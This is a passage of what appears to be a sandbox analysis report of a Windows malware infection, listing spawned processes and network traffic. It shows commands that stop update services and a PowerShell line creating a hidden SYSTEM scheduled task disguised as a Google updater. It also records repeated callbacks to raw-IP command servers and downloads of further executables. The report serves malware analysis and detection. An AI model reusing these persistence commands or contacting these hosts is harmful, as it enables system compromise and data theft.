    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:452
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5128
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2660
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2420
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5296
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5324
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4308
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:5268
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4696 -ip 4696
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4168 -ip 4168
1⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3568 -ip 3568
1⤵
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4540 -ip 4540
1⤵
PID:4480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4388

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6052 -ip 6052
1⤵
PID:4312

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:5604

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:1884

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2128

Network

DNS

254.178.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.178.238.8.in-addr.arpa

IN PTR

Response
DNS

133.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.32.126.40.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

198.1.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.1.85.104.in-addr.arpa

IN PTR

Response

198.1.85.104.in-addr.arpa

IN PTR

a104-85-1-198deploystaticakamaitechnologiescom
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nfekue.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rechc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 141
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hxianpjrcf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rpkuihkf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 182
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uheghic.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 193
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ljbliovn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 223
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jaovftf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 270
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jymarv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 156
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wyqnxuvdj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 256
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ticdfnr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 249
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hiaywcoi.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 345
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sxjhnfd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 130
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://afmkpblwfx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 217
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mkuov.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 130
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=aNkLtfv8RUASpIyycWgY
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 20:40:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=aNkLtfv8RUASpIyycWgY
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 20:40:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 20:40:42 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:40:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:_yhGfVuUiZRsrwVua2NCq6yiOi0bTg:DKwXRCiTQlPoR2Qn
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcXK4A0ARVCCFhv8WUve3dys29_ScIbz3InilWJFAdOSJXoPCqO5D-eYfwnlyLTD0-YZFDHWw

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcXK4A0ARVCCFhv8WUve3dys29_ScIbz3InilWJFAdOSJXoPCqO5D-eYfwnlyLTD0-YZFDHWw HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:_yhGfVuUiZRsrwVua2NCq6yiOi0bTg:DKwXRCiTQlPoR2Qn
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.30.27
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.30.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.30.35
DNS

27.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.30.240.157.in-addr.arpa

IN PTR

Response

27.30.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-prg1fbcdnnet
DNS

27.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.30.240.157.in-addr.arpa

IN PTR
DNS

35.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.30.240.157.in-addr.arpa

IN PTR

Response

35.30.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-prg1facebookcom
DNS

35.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.30.240.157.in-addr.arpa

IN PTR
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.30.35
DNS

254.210.247.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.210.247.8.in-addr.arpa

IN PTR

Response
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sbcxlhqhre.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vufaxaih.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 206
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:40:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.216.70.222/trafico.exe

Explorer.EXE

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:40:59 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 13:49:38 GMT
ETag: "6b400-6075cfa598c47"
Accept-Ranges: bytes
Content-Length: 439296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ljpqyht.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 266
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pmunartm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jkwxvtpb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vlwpwpef.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nfigovntw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
